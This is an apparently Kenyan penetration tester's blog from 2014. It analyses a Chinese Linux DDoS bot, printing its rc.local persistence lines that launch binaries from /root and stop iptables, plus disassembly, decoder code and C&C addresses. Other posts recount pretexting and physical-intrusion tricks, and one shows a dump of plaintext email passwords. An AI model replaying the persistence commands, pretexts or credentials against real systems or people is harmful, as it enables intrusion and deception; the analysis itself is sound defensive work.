What I do

I am an Information Risk Consultant and Penetration Tester. I specialize mostly in penetrating secure networks and computer systems, simulating an organized, professional attack against your organization, after which a detailed report summarizing the weaknesses and exploited vectors is delivered. This will help you gain control over your infrastructure's security and maximize your protection.

Saturday, November 22, 2014

NEW WAVE OF ATTACKS (this post is dedicated to Sys Admins)

I work a lot with huge Banks, several Government agencies, Parastatals and huge PR firms that are always targets of major Blackhat organizations. Mark my words, I have seen all kinds of attacks, and the dirt these hackers leave behind.



Since the Shellshock vulnerability went public I have seen some major bash attacks out of nowhere, with hackers launching serious operations in major infrastructures across the globe. Chinese bot herders are also soooo busy getting ELF binaries onto servers, especially the ones with cPanel (commonly used by all Webmasters in Nairobi), due to CGIs that the webmasters left hanging behind. Funny thing is that Sys Admins don't listen; now a lot of them have learned these lessons the hard way.

Now apart from the Chinese bot herders, Hacktivists and Organized Criminals, there is a wave of operatives literally targeting infrastructure that might have sensitive code, sensitive documents, website backups plus their web databases, and email addresses, and then uploading them to compromised servers or even 0wn3d C&Cs, after using the Shellshock vulnerabilities (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187).

The way these attacks are running, it seems like some spy organizations, well funded, well organized, with a lot of time on their hands, are ready to collect intelligence from unsuspecting infrastructures.

It's really important that Admins patch up their machines in time. Such a huge flaw, affecting every application that executes bash, from Postfix to Apache to Nginx, is Critical and can cause huge Business Impact.

Sunday, October 26, 2014

CHINA ELFs

It's been a while since I posted; I've been crazy busy, but this coming month I will set aside some time just for blogging.

A few months ago we were testing a KE Govt office that was complaining of heavy attacks which they didn't understand and couldn't locate, since it was Linux based. And as you know, GOK has less capacity as far as Cyber Crime and Cyber Warfare are concerned. So during our tests we landed on Linux.DDoS.22.

During Penetration Tests we get to find a lot, and I can assure you it is not only CyberWarfare in East Africa; there are a lot of Cyber Espionage attacks and Cyber Terror happening right now.

Linux.DDoS.22 is a Chinese ELF that is used for DDoS attacks on unaware infrastructures around the world. The attackers install the ELF as pktmake, which you will find in /bin on your Linux servers, and it modifies your /etc/rc.local so that it restarts automatically, like below:

cat /etc/rc.local
#!/bin/sh -e
/root/task1 reboot
/root/server reboot
/root/guchun26 reboot


It will even stop iptables, as follows, in rc.local:

cd  /root/
./10&
/etc/init.d/iptables stop
cd  /root/
./10&
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./10
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./10
/etc/init.d/iptables stop
cd  /root/
./ma&
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
/bin/cmds start
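As an added defender-side check (not code from the post or from the malware), here is a small C audit that walks an rc.local file and flags the three things the dump above shows: binaries launched straight out of /root at boot, relative ./name launches after cd /root, and the firewall being stopped at boot. The sample rc.local embedded in the block is constructed to match the shape of the dump; the names pktmake and /bin/cmds are taken from the post.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample shaped like the rc.local dump above; not the real file. */
static const char SAMPLE_RC_LOCAL[] =
    "#!/bin/sh -e\n"
    "/root/task1 reboot\n"
    "/root/guchun26 reboot\n"
    "cd  /root/\n"
    "./ma&\n"
    "/etc/init.d/iptables stop\n"
    "/bin/cmds start\n"
    "exit 0\n";

/* A clean Debian-style rc.local, for comparison. */
static const char CLEAN_RC_LOCAL[] =
    "#!/bin/sh -e\n"
    "exit 0\n";

/* Heuristics taken from the Linux.DDoS.22 rc.local shown above. */
static int line_is_suspicious(const char *line)
{
    while (*line == ' ' || *line == '\t')       /* skip leading whitespace */
        line++;
    if (*line == '#' || *line == '\0')
        return 0;                               /* comment or blank line */
    if (strncmp(line, "/root/", 6) == 0)
        return 1;                               /* binary launched out of /root */
    if (line[0] == '.' && line[1] == '/')
        return 1;                               /* ./name launch after cd /root */
    if (strstr(line, "iptables stop") != NULL)
        return 1;                               /* firewall torn down at boot */
    if (strstr(line, "/bin/cmds") != NULL || strstr(line, "pktmake") != NULL)
        return 1;                               /* dropper names from the post */
    return 0;
}

/* Walk the text line by line, print each suspicious line with its number,
 * and return how many were found. */
int audit_rc_local(const char *text)
{
    char line[512];
    int lineno = 0, hits = 0;
    const char *p = text;

    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line)
            len = sizeof line - 1;              /* truncate absurdly long lines */
        memcpy(line, p, len);
        line[len] = '\0';
        lineno++;
        if (line_is_suspicious(line)) {
            printf("rc.local:%d: %s\n", lineno, line);
            hits++;
        }
        if (nl == NULL)
            break;
        p = nl + 1;
    }
    return hits;
}

/* Read a file (normally /etc/rc.local) into memory and audit it.
 * Returns -1 if the file cannot be opened. */
int audit_rc_local_file(const char *path)
{
    static char buf[65536];
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return audit_rc_local(buf);
}

int main(int argc, char **argv)
{
    /* With a path argument audit that file; otherwise run on the sample. */
    int hits = (argc > 1) ? audit_rc_local_file(argv[1])
                          : audit_rc_local(SAMPLE_RC_LOCAL);
    if (hits < 0) {
        perror("open");
        return 2;
    }
    printf("%d suspicious line(s)\n", hits);
    return hits > 0;
}
```

Run it as `./rcaudit /etc/rc.local`; a non-zero exit code means at least one line matched and the box deserves a closer look with lsof and file, as the post goes on to do.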



During our reverse engineering and forensics we realized the ELF was collecting information about the infected box (hardware, processor information, amount of memory), which is sent to some Chinese crooks via encrypted communication to a C&C.

The C&C is usually hard-coded in the source code, but the Chinese use mathematical formulas to hide the information, and it's up to the forensics engineers to find that information via Reverse Engineering, Counter Cyber Intelligence and Covert Data Acquisition.

One of the IPs can be found with common checks using lsof, as below:

pktmake    1355    root    3u  IPv4   9964      0t0  TCP REDACTED.xx.ke:36811->23.234.50.32:37368 (ESTABLISHED)

With reverse engineering we were able to find other IPs from China that were used to upload logs and update the box, but the above machine, if hacked, could yield more intel about the main C&C, and that's what we were after.

An nmap scan on the box showed us this:

Nmap scan report for 23.234.50.32
Host is up (0.32s latency).
Not shown: 65305 closed ports, 44 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http-proxy    Squid http proxy 2.7.STABLE4
89/tcp    open  http          Microsoft IIS httpd
1025/tcp  open  msrpc         Microsoft Windows RPC
3306/tcp  open  mysql         MySQL (unauthorized)
5918/tcp  open  ms-wbt-server Microsoft Terminal Service
37368/tcp open  unknown


So, I am not going to go deep into how this Chinese box was exploited, but after some reverse engineering of the ELFs:

/bin/pktmake: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

We found other ELFs that were strongly associated with the main ELF.

file /bin/cmds
/bin/cmds: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.18, not stripped

file /root/guchun26
/root/guchun26: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped



And these were the source files it was compiled from:


crtstuff.c
main.cpp
DNS.cpp
AttackLogic.cpp
Iattack.cpp
info.cpp
Lock.cpp
SYN.cpp
TaskManager.cpp
TCP.cpp
TcpClient.cpp
Thread.cpp
UDP.cpp
utils.cpp
CC.cpp
rc4.c

The first part was to find the pieces of code showing how the ELF was connecting to the C&C, and how we would find all the other boxes they were using for initial attacks.

_v2072 = ">>>>>>>>>>> in net wrok thread";
     *__esp = 135652608;
    _t31 = __ebx->basic_ostream& , 5, char * )(__edi, __esi);
    _v2072 = 134746416;
     *__esp = _t31;
    L0807EF10();
    L080DEAD0(__ebx, __edi, __esi,  &_v2052, 0, 2048);
    while(( *(_a4 + 100) & 255 ^ 1) != 0) {
        _t39 = _a4 + 560->c_str(void )();
        _v2068 = 37368;
        _v2072 = _t39;
         *__esp = _a4 + 60;
        if((_t39->Connect(char * , unsigned int )() ^ 1) == 0) {
            if((L08049C60(_a4, _a4) ^ 1) == 0) {
                while(( *(_a4 + 100) & 255 ^ 1) != 0) {
                    L080DEAD0(__ebx, __edi, __esi,  &_v2052, 0, 2048);
                    if((L0805223E( ?_? ( &_v2052), _a4 + 60,  &_v2052) ^ 1) != 0) {


That's when we started to understand the mathematical formula used by the intruder.
Alright, some segment mapping:

  Segment Sections...
   00     .note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
   01     .tdata .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
   02     .note.ABI-tag
   03     .tdata .tbss

A lot of Chinese language in the source code:

.rodata:081301A0 aINZD  db 'エエスィヤュハシフラスモラヨハァーワ(%d)',0Dh,0Ah,0
0x00747E0  CUNG5
0x007518F  CUNG
0x0075693  B4CUNG
0x0102520  i18n:1999
 
 
A file called fake.cfg had some juicy information:


0
YOUR-IP-HERE:AND-HERE
10000:60000
 
 
getsockname(3, {sa_family=AF_INET, sin_port=htons(48417), sin_addr=inet_addr("mmd.mmd.mmd.mmd")}, [16]) = 0

They were also doing test connections to www.baidu.com, to see if it is reachable once the ELF is installed.

0x00E50FD  www.baidu.com
// PoC:
sendto(3, "\231\v\1\0\0\1\0\0\0\0\0\0\3www\5baidu\3com\0\0\1\0\1", 31, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 31
recvfrom(3, "\231\v\201\200\0\1\0\2\0\0\0\0\3www\5baidu\3com\0\0\1\0\1\300"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 74


DDoS functionality was actually in a file called ThreadAttack.cpp; this was interesting, because this is where we realized we might catch the main Chinese C&C server.
  0x805478A ; CThreadAttack::EmptyConnectionAtk(CSubTask &)
  0x805478A public _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask
  0x805478A _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask proc near
  0x805478A push ebp
  0x805478B mov  ebp, esp
  0x805478D leave
  0x805478E retn
  0x805478E
  0x805478E _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask endp
 
  0x8054790 ; CThreadAttack::HttpAtk(CSubTask &)
  0x8054790 public _ZN13CThreadAttack7HttpAtkER8CSubTask
  0x8054790 _ZN13CThreadAttack7HttpAtkER8CSubTask proc near
  0x8054790 push ebp
  0x8054791 mov  ebp, esp
  0x8054793 leave
  0x8054794 retn
  0x8054794
  0x8054794 _ZN13CThreadAttack7HttpAtkER8CSubTask endp
 
  0x8054796 ; CThreadAttack::FakeUserAtk(CSubTask &)
  0x8054796 public _ZN13CThreadAttack11FakeUserAtkER8CSubTask
  0x8054796 _ZN13CThreadAttack11FakeUserAtkER8CSubTask proc near
  0x8054796 push ebp
  0x8054797 mov  ebp, esp
  0x8054799 leave
  0x805479A retn
  0x805479A
  0x805479A _ZN13CThreadAttack11FakeUserAtkER8CSubTask endp
  0x80532D2 sub  esp, 214h ; Integer Subtraction
  0x80532D8 lea  ecx, [ebp+var_10C] ; Load Effective Address
  0x80532DE mov  edx, offset _ZZN9CServerIP10InitializeEvE4C_48 ; CServerIP::Initialize(void)::C.48 <======
  0x80532E3 mov  eax, 100h
  0x80532E8 sub  esp, 4  ; Integer Subtraction
  0x80532EB push eax
  0x80532EC push edx
  0x80532ED push ecx
  0x80532EE call memcpy  ; Call Procedure
  0x80532F3 add  esp, 10h; Add
  0x80532F6 lea  ecx, [ebp+var_20C] ; Load Effective Address
  0x80532FC mov  edx, offset _ZZN9CServerIP10InitializeEvE4C_49 ; CServerIP::Initialize(void)::C.49 <======
  0x8053301 mov  eax, 100h
  0x8053306 sub  esp, 4  ; Integer Subtraction
  0x8053309 push eax
  0x805330A push edx
  0x805330B push ecx
  0x805330C call memcpy  ; Call Procedure
  0x8053311 add  esp, 10h; Add
  0x8053314 push 27h
  0x8053316 push offset a7005601212 ; "70/056/012/12"  ; <============================
  0x805331B push 0FFh
  0x8053320 lea  eax, [ebp+var_10C] ; Load Effective Address
  0x8053326 push eax
  0x8053327 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char  const*,int)
  0x805332C add  esp, 10h; Add
  0x805332F push 0Ah
  0x8053331 push offset a63551; "63551" ; <============================
  0x8053336 push 0FFh
  0x805333B lea  eax, [ebp+var_20C] ; Load Effective Address
  0x8053341 push eax
  0x8053342 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char  const

So far we had the formula; now it was all about getting down to cracking the C&C information.
0x8062EF0
  0x8062EF0 ; CUtility::DeCrypt(char *, int, char  const*, int)
  0x8062EF0 public _ZN8CUtility7DeCryptEPciPKci
  0x8062EF0 _ZN8CUtility7DeCryptEPciPKci proc near  ; CODE XREF: CServerIP::Initialize(void)
  0x8062EF0 ; CServerIP::Initialize(void)
  0x8062EF0
  0x8062EF0 var_4= dword ptr -4
  0x8062EF0 arg_0= dword ptr  8
  0x8062EF0 arg_4= dword ptr  0Ch
  0x8062EF0 arg_8= dword ptr  10h
  0x8062EF0 arg_C= dword ptr  14h
  0x8062EF0
  0x8062EF0 push ebp
  0x8062EF1 mov  ebp, esp
  0x8062EF3 sub  esp, 10h; Integer Subtraction
  0x8062EF6 mov  [ebp+var_4], 0
  0x8062EFD jmp  short loc_8062F36 ; Jump
  0x8062EFD
  0x8062EFF
  0x8062EFF loc_8062EFF: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062EFF mov  eax, [ebp+var_4]
  0x8062F02 and  eax, 1  ; Logical AND
  0x8062F05 test al, al  ; Logical Compare
  0x8062F07 jz   short loc_8062F1E ; Jump if Zero (ZF=1)
  0x8062F07
  0x8062F09 mov  eax, [ebp+var_4]
  0x8062F0C mov  edx, eax
  0x8062F0E add  edx, [ebp+arg_0] ; Add
  0x8062F11 mov  eax, [ebp+var_4]
  0x8062F14 add  eax, [ebp+arg_8] ; Add
  0x8062F17 mov  al, [eax]
  0x8062F19 inc  eax  ; Increment by 1
  0x8062F1A mov  [edx], al
  0x8062F1C jmp  short loc_8062F31 ; Jump
  0x8062F1C
  0x8062F1E
  0x8062F1E loc_8062F1E: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F1E mov  eax, [ebp+var_4]
  0x8062F21 mov  edx, eax
  0x8062F23 add  edx, [ebp+arg_0] ; Add
  0x8062F26 mov  eax, [ebp+var_4]
  0x8062F29 add  eax, [ebp+arg_8] ; Add
  0x8062F2C mov  al, [eax]
  0x8062F2E dec  eax  ; Decrement by 1
  0x8062F2F mov  [edx], al
  0x8062F2F
  0x8062F31
  0x8062F31 loc_8062F31: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F31 lea  eax, [ebp+var_4] ; Load Effective Address
  0x8062F34 inc  dword ptr [eax] ; Increment by 1
  0x8062F34
  0x8062F36
  0x8062F36 loc_8062F36: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F36 mov  eax, [ebp+var_4]
  0x8062F39 cmp  eax, [ebp+arg_C] ; Compare Two Operands
  0x8062F3C jge  short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
  0x8062F3C
  0x8062F3E mov  eax, [ebp+var_4]
  0x8062F41 cmp  eax, [ebp+arg_4] ; Compare Two Operands
  0x8062F44 jge  short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
  0x8062F44
  0x8062F46 mov  eax, [ebp+var_4]
  0x8062F49 add  eax, [ebp+arg_8] ; Add
  0x8062F4C mov  al, [eax]
  0x8062F4E test al, al  ; Logical Compare
  0x8062F50 jnz  short loc_8062EFF ; Jump if Not Zero (ZF=0)
  0x8062F50
  0x8062F52
  0x8062F52 locret_8062F52: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F52 ; CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F52 leave; High Level Procedure Exit
  0x8062F53 retn ; Return Near from Procedure
  0x8062F53
  0x8062F53 _ZN8CUtility7DeCryptEPciPKci endp
  0x8062F53

And this decoded the main C&C as 61.147.103.21:54460.
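As an added example (not code from the sample or from the post), the DeCrypt routine above re-implemented in C straight from the disassembly: the loop at loc_8062F36 stops at the shorter of the two length arguments or at a NUL, and the body decrements even-indexed bytes and increments odd-indexed ones. Feeding it the two constants pushed in CServerIP::Initialize reproduces the host and port the post reports. The function names decrypt_cfg and decode_string are my own.

```c
#include <stdio.h>
#include <string.h>

/* CUtility::DeCrypt(char *dst, int dst_len, const char *src, int src_len),
 * rebuilt from the disassembly (arg_0, arg_4, arg_8, arg_C in that order).
 * Loop test at loc_8062F36: stop when i >= src_len, i >= dst_len, or
 * src[i] == 0. Body: odd i (loc_8062F09) writes src[i] + 1, even i
 * (loc_8062F1E) writes src[i] - 1. Returns the number of bytes written. */
int decrypt_cfg(char *dst, int dst_len, const char *src, int src_len)
{
    int i = 0;                                  /* [ebp+var_4] */
    for (;;) {
        if (i >= src_len || i >= dst_len)       /* the two jge checks */
            break;
        if (src[i] == '\0')                     /* test al, al / jnz */
            break;
        if (i & 1)
            dst[i] = (char)(src[i] + 1);        /* inc path, odd index */
        else
            dst[i] = (char)(src[i] - 1);        /* dec path, even index */
        i++;
    }
    return i;
}

/* The original zero-fills the destination by memcpy from a static constant
 * (C.48 / C.49) before calling DeCrypt; this wrapper does the same with
 * memset and guarantees NUL termination. */
const char *decode_string(const char *obfuscated, int src_len,
                          char *out, size_t out_len)
{
    memset(out, 0, out_len);
    int n = decrypt_cfg(out, (int)out_len - 1, obfuscated, src_len);
    out[n] = '\0';
    return out;
}

int main(void)
{
    char host[256], port[256];
    /* Constants and lengths exactly as pushed in CServerIP::Initialize:
     * push 27h / push offset "70/056/012/12" / push 0FFh / push dst
     * push 0Ah / push offset "63551"         / push 0FFh / push dst   */
    decode_string("70/056/012/12", 0x27, host, sizeof host);
    decode_string("63551", 0x0A, port, sizeof port);
    printf("C&C endpoint: %s:%s\n", host, port);
    return 0;
}
```

Because the transform is a fixed per-position offset, any other string constant passed to DeCrypt in this family can be recovered the same way, which is how the other upload and update IPs mentioned above would be confirmed.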

This C&C server also hosted the binaries used to update the small operational botnets, on an HFS app.


One of the machines we caught that was used to manipulate the L.A. Chinese bot server was 220.191.230.250.
Now do some research on that, and tell me if you know who those are.


Wednesday, July 02, 2014

MYTHS ON BIOMETRICS

Myth: Iris recognition devices use lasers to scan your eyes.

Reality: Iris recognition cameras take a black and white picture and use non-invasive near-infrared illumination that is barely visible and very safe.

Myth: "Stolen" body parts can be used to fool the system.

Reality: Quality biometric recording and detection systems can determine "liveness" in order to prevent this type of fraud.

Myth: Identical twins can fool the system.

Reality: If the system is poorly configured, then this is possible, though it can be eradicated during White Box Penetration Testing. Good systems will highlight a false match, which will require human intervention to complete the identification process.

Myth: Biometrics will get rid of the evil in our world.

Reality: Identity Management systems cannot perform miracles.


Continue doing real Penetration Testing, and let's secure facilities for real.

Wednesday, June 25, 2014

WHY DO PEOPLE STILL CODE IN BIRTHDAYS



Safes are hard to break, they say, but as long as a safe is used by a human being and built by one, it's not 100% safe anymore.

Sometimes during Pentests we get to go face to face with these machines, and with enough intel we know that what is behind that door is vital to what we are after. A lot of testers don't think this way, but as experience grows in this field you get to learn that this is a necessary strategy in real-life types of Pentest like Blackbox. Now getting to where the safe is, is always a problem; it may require you to go through a lot of hoops, e.g. as a Janitor. Well, during this operation I acted as Network Support.

IT people have inclusive access to executive offices. Have you ever seen how an office boss gets soo happy when you fix an MS Windows problem that had bothered them for a while?
"Now I can watch new movies?"
"Yes ma'am"
"Even the new ones that I couldn't before?"
"Yes, I can copy more for you if you want to"
"Go ahead, go ahead Chuck"

So one thing I have come to find is the use of digits as key codes, and personnel love using numbers they can remember; even I have that vulnerability on such authentication, e.g. SIM PIN numbers, M-Banking etc. The easiest digits people remember all their life, even when suffering from Old Timers, are birthdays. And a lot of users will simply use these on a safe. Now the problem for us as Pentesters is not being in a position to do enough research on target employees online, e.g. Social Media and Online Security Assessment.

Surveillance and Recovery Assessment is essential for such intrusions in a great way, and this is done in teams. You might find that you get a lot of access to a facility just through this kind of assessment. I am currently doing a Pentest which is similar to this, and I started as a Janitor; it's amazing that the employees won't ask who you are as long as you are serving them or cleaning their desks.

Employees and senior management need to understand that security starts with everyone, not just the ICT Department thrown into a corner cubicle and paid peanuts.

So most safes are used for storage of money, but others store confidential documents. The personnel dealing with these documents need to have that sense of security, especially with their surroundings and who has access to their office. Sometimes these safes might hold information about the whole infrastructure and other company secrets that can seriously damage the organization.

When buying a safe, it's important to understand which ones are tough, and the value it will add to the company as far as Security is concerned.

So whenever you hire a Security Firm for a Blackbox Penetration Test and they are just doing perimeter scans, just know these are the consultants we call Script Kiddies, and they are not in any way helping you to secure your Infrastructure.



Friday, June 13, 2014

THE NEW AL-QAEDA TOOL, THAT SUPPORTS RSA FOR ASYMMETRIC ENCRYPTION

This tool was first reported in 2013, but has recently been discovered to be used by Al-Qaeda for comms all over the world.

Thursday, May 15, 2014

OLD SCHOOL PIZZA ATTACK STILL WORKS

We all know of the old stories told years back, in 2000-2003, where pentesters would walk into Data-Centers with pizzas sandwiching laptops, and they would get through and set up backdoors in an infrastructure. A lot of people love pizza, it has the addictive add-ons, and this makes it a very good source of sport during Black Box Penetration Testing, when on Surveillance and Recovery Assessments, Social Engineering Assessments, Red Team Assessments and several others, to accomplish the BlackBox.



So we had this Blackbox Pentest last year, and I actually was afraid of this one, coz I actually thought this would be hard to hack into, but anyway, I always know that what challenges you makes you better and stronger.

After several go-throughs on Surveillance and Recovery we found out about one of the Directors, who seemed to be a silent investor and is based in Nairobi. We also found out about the WiFi used at the office, and an internal Data-Center that was a replica of what we were targeting in the cloud. So we needed to set up a plan and execute this attack professionally.

First step was to hack into the wireless network and second was to find a place to set up shop near their HQ office.

We started the Social Engineering Assessment due to the fact that the old school ways of Wireless Assessments weren't working, and we combined both assessments together, because breaking this WiFi key would take 20 years or so and we didn't have that amount of time; this was a three-month Penetration Test. We had to target the Support office; they must have had control of almost everything we wanted.

A few calls to the IT Team, pretending to be the Personal Assistant to the targeted director, and all I had to do was convince them that their Boss had bought them pizza as a gift for their hard work, and that he needed the number of all the members working that night and the next morning.

In the evening I hired a bike, bought about six pizzas at Pizza Inn, Westlands, and was on the road for my delivery. I also made sure my phone was silent, no camera flash, and a blocked number just in case they had it.

On arrival I kinda enjoyed a chat with them, then eventually asked for the Wireless Key to go online on FB. As the IT Guy was munching on the delicious meal, he happily penned it for me on a paper. Yes, the key was long. At the same time I had the chance to walk through the floors and capture as many frames as possible on camera. The next step was to set up a Safehouse near their offices, and within a few weeks we had rooted most of their Servers, workstations and network devices.




Tuesday, April 29, 2014

HOW A FAKE PET HELPED US DURING THE FIRST INITIAL INFILTRATION OF AN INFRASTRUCTURE

Security Starts with the People


There was this inquiry for Penetration Testing that was advertised early last year, and a lot of organizations went for it. The owners of the organization wanted to know if they could be penetrated from the outside. So several Security Firms did their quotations, convinced the client how they would do a good test, and then they decided to go for one firm, and the pentest began. This firm had convinced the client they would do a Blackbox in less than two weeks and it would be worth their money.

Well, I won't go into the details, but what they got were mostly scans, and to sweeten the report they added the website, which was hosted overseas, as it was easy to break into.

So, I was contacted later in the year by one of the Technical Managers to do a small approach on how I would target them.

So online, only two IPs were available: the gateway to the office and the mail server OWA, all heavily protected. The gateway was NATed to a few machines, one with an httpd port hosting a SAP kind of application (won't say much). The website was hosted overseas on a shared host; well, remember blackbox has no limitations.

So, we decided to start with more online recon and also ground recon, especially since Surveillance and Recovery Assessment, which is part of Blackbox, seems to yield more data for an attack.

Now this operation was not funded; it had to be as cheap as possible, but with the promise of the whole Pentest it was worth it. It was a two-man operation.

So, we decided to start scouting the area. Two or three tailgating attempts didn't work, but we discovered a flaw later on. Sunday.... the guards drink a lot on Saturdays and get to work Sundays all hungover; they can't see anything, are red-eyed and aren't attentive.

So, that Sunday we parked on the other side of the street. The organization's compound is way off town, but fenced all the way round with a stone wall. Parking lots were underground and one more was on the top floor. One part of the compound, where trucks got in to load and offload, had a normal fence, though electrified. All we needed was to gain access to at least one office and understand the Surveillance Cameras, Motion Detectors, Door-To-Door Security and Control Box Manufacturers + Versions.

So we decided to pretend to have lost a cat, and that it had gone through the side fence to the Loading Center. Selling that to the guard at the gate was going to be hard, since we were both men, and so I was to do the approach.

The first thing I had to do was to run around the block; I had to pretend to come from the other side of the fence, and I also needed to credibly sell the narrative by the heavy breathing. The guard was a Luo; he was a bit hesitant until I said I am visiting the country from Uganda. I didn't know Ugandans had such respect, but it worked. He was a bit high, recovering from his Saturday spoils, so he let me in and I started shouting the name of a fake cat while the HTC was busy photographing every part of the compound. Funny enough, the server room was actually situated off the main building, just next to the car park, and it was open during the day and closed at nightfall, as I gathered later. (Okay, that was terrifying; I wished I was deploying APT.)

I got access to the offices via the kitchen. The guards weren't even following me; he was just busy laid up in his cubicle, the others nowhere to be seen. The doors had no control, no shredding of information, and IT Offices had whiteboards with a lot of details on the infrastructure. There were no paper shredders, managers' offices were not closed, a few notepads with passwords (which we came to understand later) were stuck on the tables (personnel still do this a lot, especially with WiFi Keys), names and emails were gathered, and the information gathered was just overwhelming.


In this age, Information Security Awareness is vital for Infrastructure and Corporate Defense. What protects you could be used to infiltrate your network.


Monday, March 31, 2014

HACKBATTLE 2013, BREAKING INTO JOAN WOKABI'S LAPTOP



HACKBATTLE2013 TEAM OWNERZ INFO EXTRACT FROM DB AND EMAILS

Team 0wnErz extracting information from phpmyadmin and also from emails

HACKBATTLE 2013 FULL EMAIL RECON BY TEAM OWNERZ

This is how Team OwnErz were able to initiate a conversation with Joan and Daniella

HACKBATTLE 2013 EMAIL ACCESS FROM DATABASE SERVER

When you gained access to the DB server, the email configurations were stored there; mostly the testers were supposed to get in through phpMyAdmin.


mysql> use emails;
Database changed
mysql> select * from both_emails;
+----------+----------+-----------+---------------------------+-----------------+
| PersonID | LastName | FirstName | email                     | password        |
+----------+----------+-----------+---------------------------+-----------------+
|        1 | wokabi   | joan      | joan.wokabi@gmail.com     | n@stys4l0nw3b   |
|        2 | daniella | wambuas   | daniell.wambuas@gmail.com | qwerty2014Nasty |
+----------+----------+-----------+---------------------------+-----------------+
2 rows in set (0.00 sec)

mysql>




TARGETING AZANURU FOR MORE INFORMATION: SOCIAL ENGINEERING, HACKBATTLE 2013

By Team 0wnErz, winners of Hackbattle 2013

Learning about the subnets and floating IPs

